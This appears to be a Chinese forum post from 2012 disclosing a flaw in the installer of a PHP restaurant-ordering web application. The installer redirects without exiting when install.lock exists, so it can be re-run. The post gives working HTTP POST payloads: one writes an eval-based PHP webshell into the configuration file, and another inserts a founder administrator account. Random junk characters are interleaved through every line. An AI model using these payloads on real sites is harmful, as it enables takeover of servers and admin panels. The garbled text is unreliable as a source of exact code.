问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。+ y. D( x6 p9 E) [2 W" l
2 d/ e& S# U: Q( W" Y
<?php' p$ ^/ N9 |; i4 E
if(file_exists("../install.lock"))
! T3 C2 x! k/ q0 z2 \1 f{% S( q# ~. Z( v# d; H, u2 Q+ i
header("Location: ../");//没有退出& B3 h" a! `6 C3 @) S
}' c- b2 I& H7 k7 n7 F
; p$ z/ r7 r+ B+ t/ Y9 x
//echo 'tst';exit;1 O: f$ R& V+ ?; P
require_once("init.php");
' z2 N5 i2 g! i" D* J! E3 u: Eif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
" \3 F8 r- }# b# j9 S& b( ^{
& C$ X6 U9 Z6 y6 f e3 `; V可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
' F3 `+ l3 Z, S# `. Y7 N. ^6 F8 P" E0 d, ?+ Y/ B0 i. ]
1、getshell(很危险)
. R+ b% j V/ {5 P0 n$ V% W; Wif(empty($_REQUEST['step']) || $_REQUEST['step']==1)2 B& m; N( G) F( |3 P
{0 X; b% k* v0 r3 S: X
$smarty->assign("step",1);: C+ P- B) @0 h3 y( f* O
$smarty->display("index.html");
- X/ g; y w9 C# Z" @/ s; a- e& S}elseif($_REQUEST['step']==2)
6 {5 I- R1 i- Q1 S t{+ F& O" W9 ?2 \7 `
$mysql_host=trim($_POST['mysql_host']);
' Q" J" }7 K0 g+ Z v $mysql_user=trim($_POST['mysql_user']);
. W0 F7 v9 P5 f Z $mysql_pwd=trim($_POST['mysql_pwd']);# \3 C- [3 {6 G" m
$mysql_db=trim($_POST['mysql_db']);: A& f" R- z* |9 p* J& l$ T1 W/ C
$tblpre=trim($_POST['tblpre']);$ x. _/ t. L# r4 v& h; b
$domain==trim($_POST['domain']);
g5 c( {1 `- i( `1 F $str="<?php \r\n";3 t( N* k3 ^; h. v, p& x
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";& c+ N% w4 X6 i- \' q
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";1 M: H3 B7 ]& [2 b
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
. g' k# F m3 m0 d2 B' W$ Z t $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
" f+ T. ?) D6 G9 c7 S9 b6 F $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
+ S* b: ?$ d( R& l $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
: q7 a6 \+ K7 v9 ~+ ^2 d" E/ N $str.='define("DOMAIN","'.$domain.'");'."\r\n";& d2 J" J+ r. ~! Y
$str.='define("SKINS","default");'."\r\n";
0 u2 [ z4 x- |. v! u# \ $str.='?>';& H# U4 {* H+ X8 P$ f2 z
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
, Y& [" ~) X( t h上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马7 z* r* s- m4 y- J( R8 Q8 v
POST /canting/install/index.php?m=index&step=2 HTTP/1.1% ]$ H0 }) c: V4 {3 S/ T t
Host: 192.168.80.129
% A! y. [2 F$ S. ^. \. vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0; e# ~# W9 y8 T' z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8) A, F, J8 [( ~7 w
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
6 Y6 e' d" ?# o+ e% Y& l0 sAccept-Encoding: gzip, deflate
. j" l, e, r; {$ \Referer: http://192.168.80.129/canting/install/index.php?step=1' Z0 Z, k3 A: i1 F9 v* N! K# { h
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
4 \4 @' W; B- x C: M! l' uContent-Type: application/x-www-form-urlencoded
5 u7 c6 L" p5 Q2 ~/ v' o0 ]Content-Length: 126/ ~1 P2 n: q. o" p2 k
: \" y G' D5 d% mmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
+ l9 |* B4 C3 F- F但是这个方法很危险,将导致网站无法运行。+ s" ]7 T) c1 Y( a O; K
3 F( g# P- h% G! N6 W! _% `2、直接添加管理员, I$ B8 d7 {" G2 R) A' R. `5 }
/ t. L4 \) K0 i) a! B. z2 Selseif($_REQUEST['step']==5)9 c. P$ f% ^/ j. e" v: {6 b
{
" Q9 B5 e# I" g, F' U if($_POST)* L5 |& s! t$ M7 V+ v& U
{ require_once("../config/config.inc.php");& [6 F8 v% k% P& w
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
$ b) o1 _" o" }, n- i# H$ P mysql_select_db(MYSQL_DB,$link);3 V* v7 b$ L' H7 `% G
mysql_query("SET NAMES ".MYSQL_CHARSET );8 u. m* Y6 ?- D& P0 w, x
mysql_query("SET sql_mode=''");
% V+ C: g; h4 G( y" P+ q! c, i
% u7 b7 ]" l5 N2 ~7 N4 k $adminname=trim($_POST['adminname']);
% q, m L3 `1 z E8 v0 w $pwd1=trim($_POST['pwd1']);. n1 b5 a0 A! q1 i1 x& ]% x, j. e7 ?
$pwd2=trim($_POST['pwd2']);% @. ]7 G1 Q' ?, q( O7 L
if(empty($adminname))
+ S% T1 ~' Y x3 f; H {( V8 c7 G: \$ ]+ }
" w i8 K3 _- L; C* W: X echo "<script>alert('管理员不能为空');history.go(-1);</script>";, P+ R8 M( c7 m j; ^0 r. z0 z
exit();' s& O. u* W3 i4 J1 S. P
}
3 F7 {# f5 h" V; M9 M0 d7 b' a if(($pwd1!=$pwd2) or empty($pwd1))
, h3 k' }, [# {$ p$ A {
, v! n# {( O3 S echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
0 c* J+ M+ d! V9 V+ ~" d }) }% X) y. c8 V" r$ C' G" c+ i/ n
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员5 j6 a6 v: Y* q# }1 c. M& t
}
; F* h& ]0 h$ D0 M& @, w" q) S这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:. Q- T" E$ {2 V" i3 i. j
POST /canting/install/index.php?m=index&step=5 HTTP/1.1. u- X$ ?+ K5 I. a" k9 p$ j( Z
Host: 192.168.80.129
5 L/ v! }% y( _$ J2 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0/ }; b! a) m; @' D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. ^( x; K* {8 [, u5 M0 b* `
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.31 _3 X% B W% f" b& `: d- B( j
Accept-Encoding: gzip, deflate0 e( I. {$ f9 s6 ^" D3 M& ?) I3 t \
Referer: http://www.2cto.com /canting/install/index.php?step=10 J2 a* V8 c; }1 ]
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42; _" ^8 e2 u* j. n2 H% U! Z, X
Content-Type: application/x-www-form-urlencoded5 T9 E* [5 X8 x5 M
Content-Length: 46
/ n; z6 w% K& ^% x. h
( Q$ A: b0 Q- G. P2 Tadminname=qingshen&pwd1=qingshen&pwd2=qingshen
% |# C- |7 c, x+ M' G# { |
发表于 2012-12-4 11:13:44
收藏
支持
反对